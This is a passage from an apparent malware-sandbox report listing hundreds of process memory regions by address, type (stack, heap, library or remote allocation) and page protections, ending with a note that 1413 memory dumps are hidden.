stack
page read and write
8954000
trusted library allocation
page read and write
874D70B000
stack
page read and write
4E70000
heap
page execute and read and write
1EE5EC70000
heap
page execute and read and write
DE9000
stack
page read and write
8BDC000
heap
page read and write
2D3F000
stack
page read and write
5C3E000
stack
page read and write
54D4000
trusted library allocation
page read and write
839A000
trusted library allocation
page read and write
7FFD9B774000
trusted library allocation
page read and write
1EE60680000
trusted library allocation
page read and write
7FFD9B773000
trusted library allocation
page execute and read and write
6F0D000
heap
page read and write
1EE6F07A000
trusted library allocation
page read and write
1EE77251000
heap
page read and write
6210000
heap
page read and write
9B7000
stack
page read and write
59E0000
trusted library allocation
page read and write
63AF000
heap
page read and write
6345000
heap
page read and write
5310000
trusted library allocation
page read and write
88B6000
trusted library allocation
page read and write
28AFDF90000
trusted library section
page read and write
1EE6030E000
trusted library allocation
page read and write
8840000
trusted library allocation
page read and write
8A5D000
trusted library allocation
page read and write
DB0000
heap
page read and write
7FFD9BA60000
trusted library allocation
page read and write
6680000
trusted library section
page read and write
145A000
heap
page read and write
643D000
heap
page read and write
2B6F000
stack
page read and write
642B000
heap
page read and write
52CD000
stack
page read and write
7C50000
trusted library allocation
page read and write
8AF6000
trusted library allocation
page read and write
32CF000
unkown
page read and write
2FB6000
trusted library allocation
page read and write
15F0000
heap
page read and write
30DF000
trusted library allocation
page read and write
89C4000
trusted library allocation
page read and write
F03000
trusted library allocation
page execute and read and write
874C77D000
stack
page read and write
640F000
heap
page read and write
2BEC000
heap
page read and write
2C8E000
trusted library allocation
page read and write
2F35000
trusted library allocation
page read and write
3313000
heap
page read and write
F60000
trusted library allocation
page read and write
6EAA000
heap
page read and write
6E41000
heap
page read and write
63AF000
heap
page read and write
32C0000
heap
page read and write
28AFF064000
trusted library allocation
page read and write
1EE5D22F000
heap
page read and write
7B44000
heap
page read and write
635E000
heap
page read and write
28AFF11A000
trusted library allocation
page read and write
62B3000
heap
page read and write
30D2000
trusted library allocation
page read and write
8858000
trusted library allocation
page read and write
8280000
trusted library allocation
page read and write
652E000
stack
page read and write
552A000
trusted library allocation
page read and write
3530000
heap
page read and write
6439000
heap
page read and write
645F000
heap
page read and write
7FFD9B910000
trusted library allocation
page read and write
8AC1000
trusted library allocation
page read and write
881D000
trusted library allocation
page read and write
7FFD9B930000
trusted library allocation
page execute and read and write
83B2000
trusted library allocation
page read and write
304E000
stack
page read and write
874D68B000
stack
page read and write
52B0000
trusted library allocation
page read and write
6333000
heap
page read and write
F78000
heap
page read and write
2BC0000
heap
page read and write
7A40000
trusted library allocation
page read and write
2EA9000
trusted library allocation
page read and write
6425000
heap
page read and write
3109000
trusted library allocation
page read and write
28AFF000000
trusted library allocation
page read and write
50D0000
trusted library allocation
page read and write
8B07000
trusted library allocation
page read and write
5300000
trusted library allocation
page read and write
2C1E000
trusted library allocation
page read and write
27AB000
stack
page read and write
89F3000
trusted library allocation
page read and write
28AFF070000
remote allocation
page read and write
8052000
trusted library allocation
page read and write
F60000
trusted library allocation
page execute and read and write
2C25000
trusted library allocation
page read and write
2E8E000
trusted library allocation
page read and write
8AF0000
trusted library allocation
page read and write
7FF5000
trusted library allocation
page read and write
642C000
heap
page read and write
28AFEE88000
heap
page read and write
2CA3000
trusted library allocation
page read and write
2ABE000
stack
page read and write
6E41000
heap
page read and write
2E7F000
trusted library allocation
page read and write
6E8A000
heap
page read and write
1EE5EC50000
trusted library allocation
page read and write
59DE000
stack
page read and write
2F7E000
trusted library allocation
page read and write
8A57000
trusted library allocation
page read and write
6EB0000
heap
page read and write
8172000
trusted library allocation
page read and write
6333000
heap
page read and write
5CBE000
stack
page read and write
2E58000
trusted library allocation
page read and write
28AFF0C2000
trusted library allocation
page read and write
7FFD9B780000
trusted library allocation
page read and write
8852000
trusted library allocation
page read and write
1EE5F4A3000
trusted library allocation
page read and write
804C000
trusted library allocation
page read and write
7CB0000
trusted library allocation
page read and write
647D000
heap
page read and write
28AFD7F0000
heap
page read and write
1EE5EC40000
heap
page readonly
3BD1000
trusted library allocation
page read and write
28AFF0F4000
trusted library allocation
page read and write
6E2A000
heap
page read and write
7500000
heap
page read and write
6336000
heap
page read and write
7FFD9BA90000
trusted library allocation
page read and write
490E000
stack
page read and write
1EE5EC00000
trusted library allocation
page read and write
2ACE000
stack
page read and write
4DCC000
stack
page read and write
8325000
trusted library allocation
page read and write
8098000
trusted library allocation
page read and write
5E70000
heap
page read and write
34AD000
trusted library allocation
page execute and read and write
63A7000
heap
page read and write
FA8000
stack
page read and write
44F0000
heap
page read and write
830D000
trusted library allocation
page read and write
34D0000
trusted library allocation
page read and write
28AFEC11000
trusted library allocation
page read and write
82A3000
trusted library allocation
page read and write
5331000
trusted library allocation
page read and write
772D000
stack
page read and write
2FB8000
trusted library allocation
page read and write
2E41000
trusted library allocation
page read and write
1EE5D1A2000
heap
page read and write
28AFD8A0000
heap
page read and write
59E0000
trusted library allocation
page read and write
E28000
heap
page read and write
8354000
trusted library allocation
page read and write
28AFF00E000
trusted library allocation
page read and write
62B8000
heap
page read and write
1468000
heap
page read and write
EF0000
trusted library allocation
page read and write
1EE6F2BF000
trusted library allocation
page read and write
5C7E000
stack
page read and write
63AF000
heap
page read and write
59E0000
trusted library allocation
page read and write
F3B000
trusted library allocation
page execute and read and write
2A3C000
stack
page read and write
8023000
trusted library allocation
page read and write
28AFF0FC000
trusted library allocation
page read and write
2C85000
trusted library allocation
page read and write
88FC000
trusted library allocation
page read and write
7FFD9BAC0000
trusted library allocation
page read and write
6209000
trusted library allocation
page read and write
8BEF000
heap
page read and write
7A2E000
stack
page read and write
F2A000
trusted library allocation
page execute and read and write
30CA000
trusted library allocation
page read and write
639C000
heap
page read and write
8A8C000
trusted library allocation
page read and write
5DBD000
stack
page read and write
385F000
stack
page read and write
1EE77370000
heap
page execute and read and write
5BFE000
stack
page read and write
7FFD9BA40000
trusted library allocation
page read and write
645F000
heap
page read and write
2F80000
trusted library allocation
page read and write
6336000
heap
page read and write
642C000
heap
page read and write
28AFEE2C000
heap
page read and write
76AD000
stack
page read and write
7AAD000
stack
page read and write
61E1000
trusted library allocation
page read and write
28AFD800000
heap
page read and write
310E000
heap
page read and write
7CA0000
trusted library allocation
page read and write
52B0000
trusted library allocation
page read and write
647D000
heap
page read and write
8245000
trusted library allocation
page read and write
9871E7B000
stack
page read and write
8BB000
stack
page read and write
7B1E000
trusted library allocation
page read and write
6459000
heap
page read and write
2E90000
trusted library allocation
page read and write
3106000
trusted library allocation
page read and write
5512000
trusted library allocation
page read and write
28AFD8FF000
heap
page read and write
5227000
trusted library allocation
page read and write
7CB0000
heap
page read and write
640F000
heap
page read and write
CBE000
stack
page read and write
8B01000
trusted library allocation
page read and write
400000
remote allocation
page execute and read and write
4B13000
heap
page read and write
6180000
heap
page read and write
31D9000
stack
page read and write
50E0000
trusted library allocation
page read and write
7FFD9B77D000
trusted library allocation
page execute and read and write
8D23000
trusted library allocation
page read and write
63EC000
heap
page read and write
87F5000
trusted library allocation
page read and write
5680000
heap
page read and write
80C7000
trusted library allocation
page read and write
5273000
trusted library allocation
page read and write
1EE5F4E0000
trusted library allocation
page read and write
59E0000
trusted library allocation
page read and write
6459000
heap
page read and write
8881000
trusted library allocation
page read and write
59E0000
trusted library allocation
page read and write
643E000
heap
page read and write
6459000
heap
page read and write
8949000
trusted library allocation
page read and write
1EE6F060000
trusted library allocation
page read and write
28AFEE8A000
heap
page read and write
310F000
heap
page read and write
ED0000
heap
page read and write
28AFD891000
heap
page read and write
3190000
heap
page read and write
3138000
trusted library allocation
page read and write
87FA000
trusted library allocation
page read and write
88D9000
trusted library allocation
page read and write
2CB0000
trusted library allocation
page read and write
7AB0000
heap
page read and write
412000
remote allocation
page execute and read and write
104B000
heap
page read and write
1EE77211000
heap
page read and write
5226000
trusted library allocation
page read and write
E95000
heap
page read and write
311B000
trusted library allocation
page read and write
75ED000
stack
page read and write
498F000
stack
page read and write
7B14000
heap
page read and write
6346000
heap
page read and write
2BEF000
heap
page read and write
7AF9000
heap
page read and write
1EE5F051000
trusted library allocation
page read and write
1EE774FD000
heap
page read and write
51C0000
heap
page read and write
2F69000
trusted library allocation
page read and write
52D3000
trusted library allocation
page read and write
50F0000
heap
page read and write
880B000
trusted library allocation
page read and write
2E94000
trusted library allocation
page read and write
5370000
heap
page read and write
28AFF0A3000
trusted library allocation
page read and write
8904000
heap
page read and write
81F9000
trusted library allocation
page read and write
6330000
heap
page read and write
34A0000
trusted library allocation
page read and write
81CA000
trusted library allocation
page read and write
F00000
trusted library allocation
page read and write
F36000
trusted library allocation
page execute and read and write
2C5C000
trusted library allocation
page read and write
7FFD9B952000
trusted library allocation
page read and write
7BD0000
trusted library allocation
page execute and read and write
641C000
heap
page read and write
82B5000
trusted library allocation
page read and write
6336000
heap
page read and write
494D000
stack
page read and write
12CF000
stack
page read and write
7B36000
heap
page read and write
8A45000
trusted library allocation
page read and write
28AFF0E5000
trusted library allocation
page read and write
7FFD9B820000
trusted library allocation
page read and write
874C9B9000
stack
page read and write
59E0000
trusted library allocation
page read and write
76EC000
stack
page read and write
874C8B7000
stack
page read and write
49FE000
stack
page read and write
1EE5ECD0000
heap
page read and write
635A000
heap
page read and write
62E9000
heap
page read and write
6EAB000
heap
page read and write
7B2A000
heap
page read and write
747E000
stack
page read and write
6459000
heap
page read and write
647D000
heap
page read and write
8251000
trusted library allocation
page read and write
8307000
trusted library allocation
page read and write
88E1000
heap
page read and write
E2E000
heap
page read and write
4A3F000
stack
page read and write
28AFE790000
trusted library allocation
page read and write
7FFD9B970000
trusted library allocation
page read and write
4D70000
trusted library allocation
page read and write
86A0000
trusted library allocation
page execute and read and write
73B0000
heap
page execute and read and write
8336000
trusted library allocation
page read and write
6459000
heap
page read and write
8081000
trusted library allocation
page read and write
28AFE11A000
heap
page read and write
1EE77480000
heap
page execute and read and write
36A0000
heap
page read and write
8A4B000
trusted library allocation
page read and write
28AFEE00000
heap
page read and write
98734FD000
stack
page read and write
28AFD879000
heap
page read and write
8149000
trusted library allocation
page read and write
899B000
trusted library allocation
page read and write
2A9E000
stack
page read and write
63A7000
heap
page read and write
28AFEEFD000
heap
page read and write
2F3B000
trusted library allocation
page read and write
7FDD000
trusted library allocation
page read and write
2EBC000
trusted library allocation
page read and write
ECF000
heap
page read and write
33D0000
heap
page read and write
F13000
trusted library allocation
page execute and read and write
52A0000
trusted library allocation
page read and write
59F0000
trusted library allocation
page read and write
F20000
trusted library allocation
page read and write
3180000
heap
page read and write
3C51000
trusted library allocation
page read and write
809E000
trusted library allocation
page read and write
783E000
stack
page read and write
2CA5000
trusted library allocation
page read and write
987317E000
stack
page read and write
2B0E000
stack
page read and write
2E3F000
trusted library allocation
page read and write
3100000
heap
page read and write
9872EFE000
unkown
page readonly
28AFE890000
trusted library section
page readonly
635C000
heap
page read and write
1021000
heap
page read and write
100B000
heap
page read and write
2E3D000
trusted library allocation
page read and write
F0D000
trusted library allocation
page execute and read and write
729E000
stack
page read and write
5320000
trusted library allocation
page read and write
D3E000
stack
page read and write
821C000
trusted library allocation
page read and write
7B3F000
heap
page read and write
51EC000
trusted library allocation
page read and write
2FB4000
trusted library allocation
page read and write
7F850000
trusted library allocation
page execute and read and write
28AFF000000
trusted library allocation
page read and write
F10000
trusted library allocation
page read and write
3304000
stack
page read and write
58CF000
stack
page read and write
10DF000
stack
page read and write
28AFE113000
heap
page read and write
643D000
heap
page read and write
3120000
trusted library allocation
page read and write
640F000
heap
page read and write
2F9B000
trusted library allocation
page read and write
4B0B000
heap
page read and write
8108000
trusted library allocation
page read and write
56CE000
stack
page read and write
72DE000
stack
page read and write
2F50000
trusted library allocation
page read and write
5330000
trusted library allocation
page read and write
81B2000
trusted library allocation
page read and write
C720000
trusted library allocation
page execute and read and write
82DE000
trusted library allocation
page read and write
7A40000
trusted library allocation
page read and write
7CC0000
trusted library allocation
page read and write
766C000
stack
page read and write
647D000
heap
page read and write
2B70000
heap
page execute and read and write
6421000
heap
page read and write
8A63000
trusted library allocation
page read and write
1EE772CA000
heap
page read and write
55FE000
stack
page read and write
5A10000
trusted library allocation
page read and write
891A000
trusted library allocation
page read and write
6E41000
heap
page read and write
454D000
stack
page read and write
89D6000
trusted library allocation
page read and write
88CD000
trusted library allocation
page read and write
6E4B000
heap
page read and write
6425000
heap
page read and write
EBA000
heap
page read and write
89E7000
trusted library allocation
page read and write
87E0000
heap
page read and write
8046000
trusted library allocation
page read and write
2FB2000
trusted library allocation
page read and write
F22000
trusted library allocation
page read and write
6E51000
heap
page read and write
818F000
trusted library allocation
page read and write
890E000
trusted library allocation
page read and write
4550000
heap
page read and write
63EC000
heap
page read and write
1054000
heap
page read and write
8A3F000
trusted library allocation
page read and write
E25000
heap
page read and write
1EE605B7000
trusted library allocation
page read and write
74FD000
stack
page read and write
89ED000
trusted library allocation
page read and write
7FFD9B955000
trusted library allocation
page read and write
28AFE870000
trusted library section
page readonly
640F000
heap
page read and write
6EB0000
heap
page read and write
F32000
trusted library allocation
page read and write
8189000
trusted library allocation
page read and write
73AD000
stack
page read and write
7A50000
trusted library allocation
page read and write
643D000
heap
page read and write
81B8000
trusted library allocation
page read and write
509E000
stack
page read and write
892B000
trusted library allocation
page read and write
8313000
trusted library allocation
page read and write
6F1A000
heap
page read and write
28AFF070000
remote allocation
page read and write
2D9F000
stack
page read and write
81F3000
trusted library allocation
page read and write
987327E000
stack
page read and write
EB1000
heap
page read and write
519C000
unkown
page read and write
8011000
trusted library allocation
page read and write
5280000
trusted library allocation
page read and write
9872FFE000
unkown
page readonly
641C000
heap
page read and write
8937000
trusted library allocation
page read and write
2E5A000
trusted library allocation
page read and write
80D9000
trusted library allocation
page read and write
5EF1000
heap
page read and write
98736FE000
unkown
page readonly
88C7000
trusted library allocation
page read and write
7AC6000
heap
page read and write
8263000
trusted library allocation
page read and write
3130000
heap
page read and write
7C20000
trusted library allocation
page read and write
28AFEEC2000
heap
page read and write
E1B000
heap
page read and write
7FFD9B980000
trusted library allocation
page read and write
8183000
trusted library allocation
page read and write
2CFE000
stack
page read and write
2C8B000
trusted library allocation
page read and write
81A7000
trusted library allocation
page read and write
2F4E000
trusted library allocation
page read and write
3485000
stack
page read and write
28AFD913000
heap
page read and write
89A7000
trusted library allocation
page read and write
6293000
heap
page read and write
9872E7E000
stack
page read and write
EDF000
heap
page read and write
7C40000
trusted library allocation
page read and write
5330000
trusted library allocation
page read and write
81C4000
trusted library allocation
page read and write
504C000
stack
page read and write
77BE000
stack
page read and write
98726FE000
unkown
page readonly
9872F7E000
stack
page read and write
63A9000
heap
page read and write
80D3000
trusted library allocation
page read and write
6316000
trusted library allocation
page read and write
1EE5D237000
heap
page read and write
F2D000
trusted library allocation
page execute and read and write
62A0000
heap
page read and write
2BC8000
heap
page read and write
3BF6000
trusted library allocation
page read and write
7C90000
trusted library allocation
page read and write
837D000
trusted library allocation
page read and write
2C90000
trusted library allocation
page read and write
30FC000
trusted library allocation
page read and write
7FFD9B921000
trusted library allocation
page read and write
8D03000
trusted library allocation
page read and write
14C2000
heap
page read and write
647D000
heap
page read and write
645F000
heap
page read and write
6020000
heap
page read and write
2A70000
heap
page read and write
28AFE100000
heap
page read and write
98731FE000
unkown
page readonly
838E000
trusted library allocation
page read and write
8B0D000
trusted library allocation
page read and write
8AD8000
trusted library allocation
page read and write
6190000
trusted library allocation
page read and write
2B70000
trusted library allocation
page read and write
C7E000
stack
page read and write
98721F7000
stack
page read and write
30D8000
heap
page read and write
7FFD9B772000
trusted library allocation
page read and write
3104000
trusted library allocation
page read and write
59E0000
trusted library allocation
page read and write
1EE5D231000
heap
page read and write
2A5E000
stack
page read and write
80EC000
stack
page read and write
6E4B000
heap
page read and write
311D000
trusted library allocation
page read and write
1EE77377000
heap
page execute and read and write
30FE000
heap
page read and write
2E43000
trusted library allocation
page read and write
89A1000
trusted library allocation
page read and write
F13000
trusted library allocation
page read and write
62B3000
heap
page read and write
8029000
trusted library allocation
page read and write
8A80000
trusted library allocation
page read and write
C20000
heap
page read and write
7FFD9B92A000
trusted library allocation
page read and write
911F000
trusted library allocation
page read and write
2B5D000
stack
page read and write
5211000
trusted library allocation
page read and write
28AFF0F1000
trusted library allocation
page read and write
63A7000
heap
page read and write
4D8D000
stack
page read and write
643D000
heap
page read and write
5310000
trusted library allocation
page read and write
28AFEDA0000
trusted library allocation
page read and write
1EE5F0D7000
trusted library allocation
page read and write
2BF0000
heap
page read and write
5254000
trusted library allocation
page read and write
806B000
stack
page read and write
5330000
trusted library allocation
page read and write
5220000
trusted library allocation
page read and write
2C20000
heap
page read and write
28AFE102000
heap
page read and write
8823000
trusted library allocation
page read and write
8166000
trusted library allocation
page read and write
2BE0000
heap
page read and write
50E0000
trusted library allocation
page read and write
874C937000
stack
page read and write
6304000
trusted library allocation
page read and write
7FFD9B890000
trusted library allocation
page execute and read and write
89B8000
trusted library allocation
page read and write
8829000
trusted library allocation
page read and write
2C2D000
trusted library allocation
page read and write
831F000
trusted library allocation
page read and write
62F4000
trusted library allocation
page read and write
62B3000
heap
page read and write
82BB000
trusted library allocation
page read and write
83A6000
trusted library allocation
page read and write
1EE77050000
trusted library allocation
page read and write
30E3000
trusted library allocation
page read and write
8137000
trusted library allocation
page read and write
62B8000
heap
page read and write
2F89000
trusted library allocation
page read and write
2E5C000
trusted library allocation
page read and write
59F0000
trusted library allocation
page read and write
5F33000
heap
page read and write
28AFED14000
trusted library allocation
page read and write
822E000
trusted library allocation
page read and write
57CE000
stack
page read and write
642B000
heap
page read and write
1EE5FEE0000
trusted library allocation
page read and write
1EE771D0000
heap
page read and write
529A000
trusted library allocation
page read and write
6E8A000
heap
page read and write
518E000
stack
page read and write
5BBD000
stack
page read and write
6437000
heap
page read and write
1EE5D276000
heap
page read and write
148E000
heap
page read and write
C70D000
stack
page read and write
63EC000
heap
page read and write
FA6000
heap
page read and write
6E32000
heap
page read and write
28AFD87B000
heap
page read and write
88A4000
trusted library allocation
page read and write
62B8000
heap
page read and write
7AC0000
heap
page read and write
E0E000
heap
page read and write
8069000
trusted library allocation
page read and write
5DFC000
stack
page read and write
9056000
trusted library allocation
page read and write
89FF000
trusted library allocation
page read and write
743E000
stack
page read and write
11B0000
trusted library allocation
page execute and read and write
5330000
trusted library allocation
page read and write
3490000
trusted library allocation
page read and write
2FA1000
trusted library allocation
page read and write
9133000
trusted library allocation
page read and write
4E90000
heap
page read and write
7C60000
trusted library allocation
page read and write
14B7000
heap
page read and write
81FF000
trusted library allocation
page read and write
8371000
trusted library allocation
page read and write
F14000
trusted library allocation
page read and write
823F000
trusted library allocation
page read and write
787E000
stack
page read and write
F10000
trusted library allocation
page read and write
588E000
stack
page read and write
5360000
heap
page read and write
2F9D000
trusted library allocation
page read and write
59E0000
trusted library allocation
page read and write
2C4B000
trusted library allocation
page read and write
5E41000
heap
page read and write
3BD7000
trusted library allocation
page read and write
5A7E000
stack
page read and write
310F000
heap
page read and write
647D000
heap
page read and write
86B0000
trusted library allocation
page read and write
8AAF000
trusted library allocation
page read and write
CD0000
heap
page read and write
3500000
heap
page readonly
63EC000
heap
page read and write
811A000
trusted library allocation
page read and write
66CC000
heap
page read and write
312E000
trusted library allocation
page read and write
7FFD9BA20000
trusted library allocation
page read and write
30EB000
trusted library allocation
page read and write
80B6000
trusted library allocation
page read and write
6458000
heap
page read and write
836B000
trusted library allocation
page read and write
776B000
stack
page read and write
F70000
heap
page read and write
28AFED00000
trusted library allocation
page read and write
87E0000
heap
page read and write
34D2000
trusted library allocation
page read and write
7FFD9BA70000
trusted library allocation
page read and write
28AFF06C000
trusted library allocation
page read and write
8811000
trusted library allocation
page read and write
7FFD9B78B000
trusted library allocation
page read and write
28AFF018000
trusted library allocation
page read and write
2C89000
trusted library allocation
page read and write
8205000
trusted library allocation
page read and write
8887000
trusted library allocation
page read and write
2E79000
trusted library allocation
page read and write
8102000
trusted library allocation
page read and write
F47000
trusted library allocation
page execute and read and write
28AFE8B0000
trusted library section
page readonly
62E9000
heap
page read and write
28AFEEFA000
heap
page read and write
7B3B000
heap
page read and write
1EE774B2000
heap
page read and write
53B0000
trusted library allocation
page read and write
6425000
heap
page read and write
28AFEDB0000
trusted library allocation
page read and write
530D000
stack
page read and write
28AFECE0000
trusted library allocation
page read and write
1041000
heap
page read and write
643D000
heap
page read and write
88D1000
heap
page read and write
5E52000
heap
page read and write
13AC000
stack
page read and write
28AFF070000
remote allocation
page read and write
7FFD9BAA0000
trusted library allocation
page read and write
8AA9000
trusted library allocation
page read and write
8075000
trusted library allocation
page read and write
800B000
trusted library allocation
page read and write
63A6000
heap
page read and write
1EE77080000
trusted library allocation
page read and write
808D000
trusted library allocation
page read and write
887B000
trusted library allocation
page read and write
28AFF04D000
trusted library allocation
page read and write
EC9000
heap
page read and write
88AA000
trusted library allocation
page read and write
2BFE000
stack
page read and write
3134000
trusted library allocation
page read and write
643E000
heap
page read and write
2F6F000
trusted library allocation
page read and write
59E0000
trusted library allocation
page read and write
34B9000
trusted library allocation
page read and write
30E6000
heap
page read and write
642C000
heap
page read and write
643D000
heap
page read and write
640F000
heap
page read and write
874C7F9000
stack
page read and write
6290000
heap
page read and write
8017000
trusted library allocation
page read and write
73D9000
stack
page read and write
EAA000
heap
page read and write
61EC000
stack
page read and write
1EE5D22D000
heap
page read and write
7B0D000
heap
page read and write
6437000
heap
page read and write
3228000
heap
page read and write
79EE000
stack
page read and write
80EB000
trusted library allocation
page read and write
2E8C000
trusted library allocation
page read and write
635C000
heap
page read and write
1EE60336000
trusted library allocation
page read and write
88F0000
heap
page read and write
63EC000
heap
page read and write
28AFEC50000
trusted library allocation
page read and write
28AFECE1000
trusted library allocation
page read and write
7FFD9B95B000
trusted library allocation
page read and write
8087000
trusted library allocation
page read and write
3257000
heap
page read and write
8914000
trusted library allocation
page read and write
641C000
heap
page read and write
9872D7E000
stack
page read and write
1455000
heap
page read and write
6F10000
heap
page read and write
1EE6030C000
trusted library allocation
page read and write
643D000
heap
page read and write
74EE000
stack
page read and write
7AC0000
heap
page read and write
5E70000
heap
page read and write
8AE4000
trusted library allocation
page read and write
2D4F000
trusted library allocation
page read and write
There are 1413 hidden memdumps, click here to show them.